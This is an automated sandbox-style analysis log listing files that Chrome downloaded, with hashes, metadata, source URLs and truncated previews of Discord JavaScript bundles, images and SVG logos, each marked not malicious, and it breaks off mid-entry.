                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["shared"],{167913:function(e,t,a){"use strict";e.exports={anchor:"anchor_c8ddc0",anchorUnderlineOnHover:"anchorUnderlineOnHover__78236"}},881775:function(e,t,a){"use strict";e.exports={avatar:"avatar__991e2",avatarDecoration:"avatarDecoration_ae35e3",avatarSpeaking:"avatarSpeaking__61fb1",avatarStack:"avatarStack__6604a",cursorDefault:"cursorDefault_e4f616",mask:"mask__1979f",pointer:"pointer__4360d",pointerEvents:"pointerEvents__33f6a",status:"status_bf52c0",svg:"svg_f5b652",wrapper:"wrapper_edb6e0"}},26541:function(e,t,a){"use strict";e.exports={focusFill:"focusFill_b97f34",focusStroke:"focusStroke__2cebd",highlight:"highlight__0768a",isHighlighted:"isHighlighted__40992",lowerBadge:"lowerBadge__669e7",noContain:"noContain__8ce64",simpleFocused:"simpleFocused__1a6f6",svg:"svg_ad7356",upperBadge:"upperBadge_c7cfb3",wrapper:"wrapper__3af0b",wrapperSimple:"wrapperSimple_a34580 wrapper__3af0b"}},213372:function(e,t,a){
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):7170
                                                                          Entropy (8bit):7.960587783885245
                                                                          Encrypted:false
                                                                          SSDEEP:192:H/EkVAFxKsNA4PyVjv5SRAeL15zqGhdmlRZPcJVc:HMkajKse4KCRp3O0
                                                                          MD5:342152B7FDCB21B38FB77D6B55DAB77B
                                                                          SHA1:C98E9CC318EEF9DBE98DF17FE6C3AFC699DBEE33
                                                                          SHA-256:A1962F56716C3FC8E93E593DD611F7B45A8632BACF8DF45B56F9DCC5B3C10958
                                                                          SHA-512:DC2F9C260707BF9E25C3EA6F38239439A33DC19A7BF88A47660A917DAF7F2280AEC3DADC03D31DBA6494E052CE49CFDB3B80E534A0AD53FB8CE2CC9ABFE7662F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/9f259366-0bcd-4817-0af9-f78773e41900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF....WEBPVP8X..............ALPH]....W..m..?...DDd..)..l.I.......H....a#.?..r....b-G.............................=.......B..A...VP8 v...p....*....>I$.E..!.:..(....w0h...o..a.IS3....tscQ.............k.W..c.......e.?W...9..~=z.....).k..{..U.#...7.......~..J.....W...+........h. .............o.k.m.w..'._._.........@?..........`...n..ZH.....2..4G.{y....OHa...~....K.p.Tk.@..*]."._..D.R.9.....%..|.....(T...EF.d..B..z.wa...}.......E.+.[..'...l..V.W...m...tz..0.7^...hX.AE.mo.SY.C.#..._'..Ei...d..yJ._...V.......}d....W..M."4.1"...}....`d%.D\.G1..q.~....a......\c.....$/..p...9.}...J..y..-..7...)Pa././]H)F..=.A...`.%.....c....H&;..I..1$~y...d.J.N..%..X........I.*.Ll....1.<.......&....8n...{J.7c.eRD....{.NNx...g.+..&So..I.../...(m.8J....UH.S...;e....ie....j..b....t-..{...6|a.........-#..h..Q......J..:.K.....R+....K..i.........7...).~....Y.......8t+.-...v.9.0;.=..\........M?/`F..].:.A^r0..^...H.n.~!.0\._g].?W.R..Tw2....]....K...wMm.x M.0..[.....0.K..8vr
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48411)
                                                                          Category:downloaded
                                                                          Size (bytes):48460
                                                                          Entropy (8bit):5.548392757757452
                                                                          Encrypted:false
                                                                          SSDEEP:768:oVURujRbSSnzKwUfaVWw/pLTmbNBOJqJ0AVmKPKXdsGbwduNTUNOAfjYCmv49qLl:xmQSnd/YDKXdsGbwduNTUNOAfjYCmv4w
                                                                          MD5:127B0DC30304F8BD6A41626DC557DFA9
                                                                          SHA1:4C7E9F2500AE29F6E9433BAF36D654BD8A3039BB
                                                                          SHA-256:DE34D292B561168CB6A79FB466E20BD2CE5F091CB04494EDEAFCBD0817EBB5D4
                                                                          SHA-512:FA586CCA0C40B3AFF4451655F177652BD6EDE0DC5247ACE761111511583F87227FC53350E338427B541E7A51702C09375F1423AA250A59A122064677B83BE375
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/0e38d72b52460ff6e911.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["13553"],{809764:function(e,t,i){"use strict";e.exports=i.p+"2c5a06a01ee8c97f890d.svg"},352674:function(e,t,i){"use strict";i.r(t),i.d(t,{default:function(){return r}});var l=i("913144"),r={startTyping(e){l.default.dispatch({type:"TYPING_START_LOCAL",channelId:e})},stopTyping(e){l.default.dispatch({type:"TYPING_STOP_LOCAL",channelId:e})}}},447060:function(e,t,i){"use strict";i.r(t),i.d(t,{BellZIcon:function(){return a}});var l=i("37983");i("884691");var r=i("669491"),n=i("75196");let a=e=>{let{width:t=24,height:i=24,color:a=r.default.colors.INTERACTIVE_NORMAL,colorClass:s="",...o}=e;return(0,l.jsxs)("svg",{...(0,n.default)(o),xmlns:"http://www.w3.org/2000/svg",width:t,height:i,fill:"none",viewBox:"0 0 24 24",children:[(0,l.jsx)("path",{fill:"string"==typeof a?a:a.css,d:"M22.07 3.29 18.68 7h2.82c.28 0 .5.23.5.5v1a.5.5 0 0 1-.5.5h-5.33a.5.5 0 0 1-.5-.5v-1a1 1 0 0 1 .21-.63l1.1-1.38 1.99-2.5H16.5a.5.5 0 0 1-.5-.5V1.5c0
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (53618), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):91205
                                                                          Entropy (8bit):5.417680720924133
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lct3QbWvGA9kSNwQ0+eXxLlf18XtTHMPUTDJvzXAg5:lct3QbWvm+eXxLlf1SuAdzR
                                                                          MD5:996732862910A2ABADA4C2402C3F2DF2
                                                                          SHA1:1DAB728A5ACC1AF56CB3F56D28C1C5949496046E
                                                                          SHA-256:F20671AD205C5AA544F8E6A464928307E8C638469E65A3628506967CDB3064D5
                                                                          SHA-512:37AE49FCB7B602424DE86408547E99BBA74E52BD9089ED220FE1F5ECBE3D05662C72A334FAB5EAB6D2DC5433E46B8EC6E3C5B9F1F410D43FB9D2923E09118C85
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/27043.105ce50242094adf158e.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["27043"],{525217:function(D,u,E){"use strict";D.exports={0:"O",1:"l",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":"..",".":"..",".":"..",".":"..",".":"..",".":"..",".":"..",".":"..",".":"..","\uD805\uDCBF":"..",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".","\uD804\uDF00":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":".",".":"."
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (20995)
                                                                          Category:downloaded
                                                                          Size (bytes):21050
                                                                          Entropy (8bit):5.469729501265602
                                                                          Encrypted:false
                                                                          SSDEEP:384:T1k/yypaoHCx1xFdOnom/9ar6WfsCzvK4A26q:+NP0unb/9arZPvK4Arq
                                                                          MD5:3D7D3C6641376EAB526DC37C2A3AEA87
                                                                          SHA1:9A4405500EC4685D070B940E3E58DBE95EBEDF94
                                                                          SHA-256:8BD28E45BDF228ABEEAEC72FEC246300BF1A2D85ED2BEC3710889CB3AD8B72DD
                                                                          SHA-512:25AA55A5F94182E557CE51E3C8BF747622AF34E31D9BD70D740EE6FB4BF4BA8B821132C4DA145CB420C27523DF3B6CC62AEF3E16B2B8CCF2C461D199467A1384
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/22843.1bda3edd4dd152273661.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22843"],{338286:function(t,r,n){"use strict";var e=n("904520"),o=n("649675"),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a constructor")}},88052:function(t,r,n){"use strict";var e=n("470984"),o=TypeError;t.exports=function(t,r){if(e(r,t))return t;throw o("Incorrect invocation")}},341088:function(t,r,n){"use strict";t.exports="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof DataView},188523:function(t,r,n){"use strict";var e,o,i,u=n("341088"),f=n("814026"),c=n("503486"),a=n("125359"),s=n("472960"),y=n("59393"),h=n("681802"),p=n("649675"),v=n("366483"),d=n("484784"),g=n("18563"),l=n("470984"),A=n("80282"),w=n("823493"),x=n("174669"),b=n("319778"),T=n("515011"),I=T.enforce,E=T.get,Int8Array=c.Int8Array,R=Int8Array&&Int8Array.prototype,Uint8ClampedArray=c.Uint8ClampedArray,m=Uint8ClampedArray&&Uint8ClampedArray.prototype,F=Int8Array&&A(Int8Array),M=R&&A(R),_=Object.prototype,TypeError=c
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:dropped
                                                                          Size (bytes):6065
                                                                          Entropy (8bit):7.906110274967841
                                                                          Encrypted:false
                                                                          SSDEEP:96:PlaFNHmZB+daw53OmyZtOvaisZlQObAIJ5dx6aoeNTOYwPHtO2puuVxt3+F3ZEeX:PoaE5+b2aisZNbAIJ/I7eNTdKHtV0uVm
                                                                          MD5:A07ED4AE4FC5BD786EE939B358E21936
                                                                          SHA1:E4C3B55C50DA3080E951CE07E6DF85CCF9639947
                                                                          SHA-256:4B1C6B0198B2E91DD3EDC3D5AEF6C4D976328E0024AF96490F908945BC79CBD6
                                                                          SHA-512:563B6598922A76E0A51ED744680CFD57B9517AA134A5C0C77ECD6B1813890D56E86601A145F95711D3DDEE4E6200E7AE5B795B31AE47AB77FCE95D19D421C6D0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".........................................A..........................!1A.."Qa.2q..#BRr...b...$3C...s.4S...................................-........................!1."2...AQ.Rq.a................?...+L..)@.R...7.1.p.K*X....|q_...*(iE...Zy.......e..gn......Z...3V..n...2..i.4..+."..=.X.$..Xx...!~`u.#....Yj?F.x.....V|..7>....r..]..-.J.:8..!.W!T.....Ed~.eg..S.!l./iyQ.N...nY..[ FRx..9.r.........t8......r..~..#Eq....%.51..K8C.9B... .B....{....ai.....%...z...O......~*..w.(^?.84..X..{..c.qJR.)..(.JR...(.JW...W......(.,....9....M{%..R.+.+.R.~.....[.. .....O..k.#0.\.]KyI?.:..M8.z:T.&.-,.p.0.+........g....:.U.I^.......|x.M....HB. ..IeDg.].Q...(....0VG.y......{....M..?*.,....i=/q.".g"+6.V.E._O. .HH.......S.x.\.r...1P......3.x..Y......dB........*..#.......vx.<iEmn....A<..?...-".'.I...j;..<Y.b.uD..Cq6.K..rydn...Z.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (13527)
                                                                          Category:downloaded
                                                                          Size (bytes):13582
                                                                          Entropy (8bit):5.199485931599584
                                                                          Encrypted:false
                                                                          SSDEEP:384:cwoqMwyJp0qwjXq7pvVpd0PqXWV/5OxHOrTBcx7Sp:noYyb0VjXqVH9m95SurTBcx7Sp
                                                                          MD5:502FF8E5505ED7CA0324277B0BC89A44
                                                                          SHA1:D72FBDD0644C128B92E705195BE59364FE41D03A
                                                                          SHA-256:DA6F72756A57CF6B4EE7FE8D1FFA539976246470D740B0434E62CE7BB3D4A60F
                                                                          SHA-512:76FB2C1EC28125FDFBDE0411E771064A1B2A5DCBA836D42D258FDC65691E3DEE82289B84F84F557A5655649015A01C2E68CBF5D813FF1EF7D6CEB0DF5233405C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/75676.8481ee3ef6c0d7c670c6.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75676"],{713876:function(e,l,t){"use strict";t.r(l),t.d(l,{ChannelListMagnifyingGlassIcon:function(){return s}});var n=t("37983");t("884691");var a=t("669491"),i=t("75196");let s=e=>{let{width:l=24,height:t=24,color:s=a.default.colors.INTERACTIVE_NORMAL,colorClass:r="",...c}=e;return(0,n.jsxs)("svg",{...(0,i.default)(c),xmlns:"http://www.w3.org/2000/svg",width:l,height:t,fill:"none",viewBox:"0 0 24 24",children:[(0,n.jsx)("path",{fillRule:"evenodd",d:"M18.5 23c.88 0 1.7-.25 2.4-.69l1.4 1.4a1 1 0 0 0 1.4-1.42l-1.39-1.4A4.5 4.5 0 1 0 18.5 23Zm0-2a2.5 2.5 0 1 0 0-5 2.5 2.5 0 0 0 0 5Z",clipRule:"evenodd",fill:"string"==typeof s?s:s.css,className:r}),(0,n.jsx)("path",{d:"M3 3a1 1 0 0 0 0 2h18a1 1 0 1 0 0-2H3ZM2 8a1 1 0 0 1 1-1h18a1 1 0 1 1 0 2H3a1 1 0 0 1-1-1ZM3 11a1 1 0 1 0 0 2h11a1 1 0 1 0 0-2H3ZM2 16a1 1 0 0 1 1-1h8a1 1 0 1 1 0 2H3a1 1 0 0 1-1-1ZM3 19a1 1 0 1 0 0 2h8a1 1 0 1 0 0-2H3Z",fill:"string"==typeof s?s:s.css,
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):308414
                                                                          Entropy (8bit):5.139017656743722
                                                                          Encrypted:false
                                                                          SSDEEP:3072:pGIJ/XoEloeNu+GPQ0H3oTuPlRLZ/QQEL+vunThm+v3PrzFKqk:pnJ/XTqyuJY0XoI1Y+vuThm+H3FKqk
                                                                          MD5:0F3F35039E1BBCEC1FAAFA1AFC24C563
                                                                          SHA1:A6EF7C95B7B4BFA50ABAADBCC9E6DF139DEF4B9F
                                                                          SHA-256:4B79C0ADCBAC366901B8DEF00D62C698F3634D30A2E76DA6CB67AA72AF99DE36
                                                                          SHA-512:A97A23CD651EB29D41DD0C257D0834DCF5E7C6E3EDCEB467FECB8A4C9B3EA4F37047D6930431D9D9DEBC2346AEF8D5322C330B2B013A94092A6331765B36FA0B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/51301.032f682bd3663cc3e88c.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["51301"],{895547:function(t,s,c){"use strict";c.r(s),c.d(s,{default:function(){return e}}),c("781738"),c("424973");var e=function(){var t={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.2/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(t){var s="string"==typeof t?parseInt(t,16):t;return s<65536?n(s):n(55296+((s-=65536)>>10),56320+(1023&s))},toCodePoint:g},onerror:function(){this.parentNode&&this.parentNode.replaceChild(o(this.alt,!1),this)},parse:function(s,e){var u;return(!e||"function"==typeof e)&&(e={callback:e}),("string"==typeof s?function(t,s){return a(t,function(t){var c,e,u=t,r=p(t),n=s.callback(r,s);if(r&&n){for(e in u="<img ".concat('class="',s.className,'" ','draggable="false" ','alt="',t,'"',' src="',n,'"'),c=s.attributes(t,r))if(c.hasOwnProperty(e)&&0!==e.indexOf("on")&&-1===u.indexOf(" "+e+"="))u=u.concat(" ",e,'="',c[e].replace(f,d),'"');u=u.concat("/>")}retu
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (37124)
                                                                          Category:downloaded
                                                                          Size (bytes):37179
                                                                          Entropy (8bit):5.578104339747185
                                                                          Encrypted:false
                                                                          SSDEEP:768:pS3dKn5l0BY7LDqNQ0tDYQ6+tbm+otXSNVaCOPb0fqQz:adKn5l0ELDqNQ0tDYk0+otXSN4A/z
                                                                          MD5:C0131D212C27BDA7A6CE02D34FD31011
                                                                          SHA1:861C9445C4F616A29B9C1043E0F57F46E7621CAA
                                                                          SHA-256:F43A049F7758A93DCD21384980C993764A8CBB52EF74C024117A89CE4CD09C05
                                                                          SHA-512:D60AA84012926A8E0B4AF38DF1DB597B48C8E90E0199E7CAB091A92061AA002E14871C28B54E70429C70C9F89BE80EBB68C8534700D0DF882993765D1EF14FAF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/59459.805f1d37a012735e4e89.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["59459"],{304983:function(e,t,n){"use strict";n.r(t),n.d(t,{MoreHorizontalIcon:function(){return u}});var r=n("37983");n("884691");var l=n("669491"),a=n("75196");let u=e=>{let{width:t=24,height:n=24,color:u=l.default.colors.INTERACTIVE_NORMAL,colorClass:o="",...i}=e;return(0,r.jsx)("svg",{...(0,a.default)(i),xmlns:"http://www.w3.org/2000/svg",width:t,height:n,fill:"none",viewBox:"0 0 24 24",children:(0,r.jsx)("path",{fill:"string"==typeof u?u:u.css,fillRule:"evenodd",d:"M4 14a2 2 0 1 0 0-4 2 2 0 0 0 0 4Zm10-2a2 2 0 1 1-4 0 2 2 0 0 1 4 0Zm8 0a2 2 0 1 1-4 0 2 2 0 0 1 4 0Z",clipRule:"evenodd",className:o})})}},789394:function(e,t,n){"use strict";n.r(t),n.d(t,{ChannelEmojisExperiment:function(){return l}});var r=n("862205");let l=(0,r.createExperiment)({kind:"user",id:"2023-03_channel_name_emojis",label:"Channel Emojis",defaultConfig:{enabled:!1,left:!1},treatments:[{id:1,label:"Enable channel name emojis",config:{enabl
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):3146
                                                                          Entropy (8bit):4.484082045212369
                                                                          Encrypted:false
                                                                          SSDEEP:48:C4LO/K7oWBkomgBkRzd0kJBJkI8JkINGD/dYk2kahkzd/FnLgkpmZ5ZOE83VCn:RO/IS53JBJbKbN4WQbMRZmEAI
                                                                          MD5:81084FF5A27B6E6FF487E479C37D1660
                                                                          SHA1:81A274F69A1358F85715A0FEA227730D795CB353
                                                                          SHA-256:075DE1D6EA4FB470197A88BA371F60F70B819B250CB5AF8BD6A4794B1A9CA4A1
                                                                          SHA-512:CCCD00A5C013B130BE0A8466F903F7EEE9306518DFAA8758849027EBC1829EA2A6B7516E4D2070B110A12EC7EB559E3B75D256AD1B07BE3FD8595C0E430DC0D5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/44d5e1639bc492dc8d62.svg
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19">. <defs>. <style>. .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225}. </style>. </defs>. <g id=".._2" data-name=".. 2">. <g id="Layer_1" data-name="Layer 1">. <path class="cls-1" d="M89.59 19.89 84.93 8.38a5.51 5.51 0 0 0-7.19-3l-5.67 2.25A12.42 12.42 0 0 0 56 .91L45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0 0 3.04-7.19ZM11.65 52.94a2.76 2.76 0 0 1-3.59-1.52l-3.63-9A2.76 2.76 0 0 1 6 38.87l4-1.65 5.69 14.07ZM22.33 39.6a3.72 3.72 0 1 1 2.06-4.85 3.71 3.71 0 0 1-2.06 4.85Zm33.36-1.55-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (13964)
                                                                          Category:downloaded
                                                                          Size (bytes):14019
                                                                          Entropy (8bit):5.309146670943323
                                                                          Encrypted:false
                                                                          SSDEEP:192:EGpth4qcpZ3pr+WP8wi0vgXd8jgqaUyCi7MiI99AcOlAakGL4f07rkj0HOLGJ:H3JOsW0B0/aU1tiI9FOu00Ywq
                                                                          MD5:B04469C4FF1A1E4369A1238F1A6E7E13
                                                                          SHA1:BAA699271E0BAD0D5D568F5D0CB2DAC21F5A2D0B
                                                                          SHA-256:2DC6A1DA0D49480F89CCAB794EC25A14CAB0CA4034039AE26E39FACCDDA82A50
                                                                          SHA-512:3917205BF53242E813955CCAF064812BCF55872367920593E67A17D60CB7A3928E73A8861ED8E657A7D7C6F6CCF6593C1054652B162989A1650445276622A395
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/58409.1811376ebb7f14b0be53.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["58409"],{727204:function(t,r,n){"use strict";var e=n("125359"),o=n("649675"),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},418855:function(t,r,n){"use strict";var e=n("472960"),o=String,i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not an object")}},759413:function(t,r,n){"use strict";var e=n("124852"),o=n("165022"),i=n("308274"),u=function(t){return function(r,n,u){var c,s=e(r),f=i(s),a=o(u,f);if(t&&n!=n){for(;f>a;)if((c=s[a++])!=c)return!0}else for(;f>a;a++)if((t||a in s)&&s[a]===n)return t||a||0;return!t&&-1}};t.exports={includes:u(!0),indexOf:u(!1)}},745795:function(t,r,n){"use strict";var e=n("64980"),o=e({}.toString),i=e("".slice);t.exports=function(t){return i(o(t),8,-1)}},539536:function(t,r,n){"use strict";var e=n("59393"),o=n("531232"),i=n("85181"),u=n("541368");t.exports=function(t,r,n){for(var c=o(r),s=u.f,f=i.f,a=0;a<c.length;a++){var p=c
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (14002)
                                                                          Category:downloaded
                                                                          Size (bytes):14053
                                                                          Entropy (8bit):5.559377000216739
                                                                          Encrypted:false
                                                                          SSDEEP:192:hdqk1NBPqaHO95Nfrd52UFFlolBuHSr7BoFqZUdn1nozwz3Ai7j6fz:hdb1N9wrHHolBuHULun1ozwzQiab
                                                                          MD5:4A6B1F9F25AA7E5C682CBA70FEE4C14C
                                                                          SHA1:2D1453FA1AD76A9D90624BEA212FAD98DBAB60D7
                                                                          SHA-256:ABEE8837B9EB01DE4D5E7C1998F500D229EDAF8AF01539B96DF84B8DA5F1B147
                                                                          SHA-512:0011F6AE4F3FE91123085018A27BC1625CFC2456ED8CFD3DEE025B7876EF150199AD5FF680D26C84724F42A8E408B507DEBB62BBAD728816F08D9868C09BC617
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/ccc86f642a740efceacb.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["88081"],{929887:function(e,t,n){"use strict";e.exports=n.p+"b024d0fd63aa42ba8670.png"},25116:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return i}});var a=n("49111");function i(e){return e.type===a.MessageTypes.DEFAULT&&null!=e.messageReference}},500858:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return r}}),n("702976");var a=n("568734"),i=n("49111"),r=e=>null!=e&&null!=e.attachments&&!(e.attachments.length<1)&&e.attachments.some(e=>null!=e.flags&&(0,a.hasFlag)(e.flags,i.MessageAttachmentFlags.IS_REMIX))},95045:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o},renderAutomodMessageMarkup:function(){return u}}),n("222007"),n("781738"),n("355025");var a=n("367376"),i=n("240873"),r=n("49111");let s=new Set([r.MessageEmbedTypes.IMAGE,r.MessageEmbedTypes.GIFV]),l=new Set(["strong","em","u","text","inlineCode","s","spoiler"]);function o(e){let t=arguments.length>1&
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (38273)
                                                                          Category:downloaded
                                                                          Size (bytes):38328
                                                                          Entropy (8bit):5.540964698667492
                                                                          Encrypted:false
                                                                          SSDEEP:768:4WeK/NruB2feVsJ5T2AzBa17Qey6RzaM73BfNY4tSOwbEg:HVruBsJ5T9Ba1paM73BfNY4Qqg
                                                                          MD5:962BA86F87E07B412433CE8331E70C94
                                                                          SHA1:5F72F19200E43C3C9CCF66FB49CE42F9ABE211E0
                                                                          SHA-256:0D8BA8DCB5E1410E9688139CE51BDD089F6605F104F2CD947157A60BB5D7EC99
                                                                          SHA-512:8BCE6D1C6FC7D937708388B9054D55DF32F9FC437F3C64E08734227D1B65838EA4DEE307D6A30CADF5FCDD153807A6EEFF0CE73A51F5816E7262623993A0A4E1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/62768.232f00c591becc89b0ca.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["62768"],{32974:function(e,t,n){"use strict";e.exports=n.p+"72b9b5356f57edb2ba51.svg"},137852:function(e,t,n){"use strict";e.exports=n.p+"a6ac55e775bc50ff5bff.svg"},511117:function(e,t,n){"use strict";e.exports=n.p+"52e736e812c20d1dfda1.svg"},55620:function(e,t,n){"use strict";n.r(t),n.d(t,{fetchAllStoreListingsForApplication:function(){return c},fetchStoreListingForSku:function(){return f},fetchStoreListingById:function(){return p},fetchStoreListingForApplication:function(){return h},matureAgree:function(){return S},matureDisagree:function(){return m},joinPublishedStoreListingSkuGuild:function(){return _},goToSKUStoreListing:function(){return I},goToApplicationStoreListing:function(){return E}});var i=n("872717"),r=n("913144"),l=n("84460");n("299285");var a=n("393414"),s=n("552712");n("698041");var u=n("167726"),o=n("271560"),d=n("49111");function c(e){return(0,o.httpGetWithCountryCodeQuery)({url:d.Endpoints.STORE_
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):2959
                                                                          Entropy (8bit):4.564561843761891
                                                                          Encrypted:false
                                                                          SSDEEP:48:8VnUFcr6cH6mtufdizhBk6msu6m1bGRE01phaydEdREtM:CUFjcH6m8dizbk6msu6mInE/
                                                                          MD5:1D299086EDE63550EF233D25A345C769
                                                                          SHA1:09300F85C3AA5393F67783C91BD158445D28478D
                                                                          SHA-256:CAD078CC0384C997C71F49FCF31E40A2738BCEE5EC0039361ED6CE052E68E176
                                                                          SHA-512:D1B57F0E3CC6FE335B476E7BC9A423FA42BC206C7E8366556765E820F1BA05B1977F48D0D7FDB1DB7888C2239FAAEAD9D577BA88AFBF2D14C400C180F40906CB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/notcommon.svg
                                                                          Preview:<svg fill="none" height="105" viewBox="0 0 247 105" width="247" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><clipPath id="a"><path d="m20 20h65v65h-65z"/></clipPath><rect fill="#000" height="105" rx="12.9877" width="246.08"/><g fill="#fff"><g clip-path="url(#a)" clip-rule="evenodd" fill-rule="evenodd"><path d="m32.9185 23.9656h-9v8h-4v-8-4h4 9zm0 57h-9v-9h-4v9 4h4 9zm40 4h8 4v-4-9h-4v9h-8zm0-61v-4h8 4v4 8h-4v-8z"/><path d="m75.5167 39.5-22.5167-13-22.5167 13v26l22.5167 13 22.5167-13zm-23.4025 20.8462 13.1429-12-3.3713-3.6924-11.5947 10.5864-5.7668-4.436-3.0486 3.9631 7.4286 5.7143 1.6617 1.2782z"/></g><path d="m107.8 22.3957v7.6l-5.4-7.6h-2.4v14h3.2v-7.6l5.4 7.6h2.4v-14z"/><path d="m119.878 36.6757c4.02 0 7.28-3.16 7.28-7.28s-3.26-7.28-7.28-7.28-7.28 3.16-7.28 7.28 3.26 7.28 7.28 7.28zm0-3.12c-2.28 0-4.08-1.66-4.08-4.16s1.8-4.16 4.08-4.16 4.08 1.66 4.08 4.16-1.8 4.16-4.08 4.16z"/><path d="m137.359 22.3957h-10.4v3.08h3.6v10.92h3.2v-10.92h3.6z"/><path d=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (7954)
                                                                          Category:downloaded
                                                                          Size (bytes):8009
                                                                          Entropy (8bit):5.361038099482472
                                                                          Encrypted:false
                                                                          SSDEEP:96:youE4IUds7RoOf3bL0rJCLTdtpaBxAFR219J+/r6QUvVsP2RzH5OuE0eiRfocHOn:7uE4I+s9bL0ENI4c19J+TFUvfk
                                                                          MD5:DD0EE3318FA17CD9D5366962816E2D71
                                                                          SHA1:C7942219B0DEED580CBEEAB6A119F55EE82A9D9C
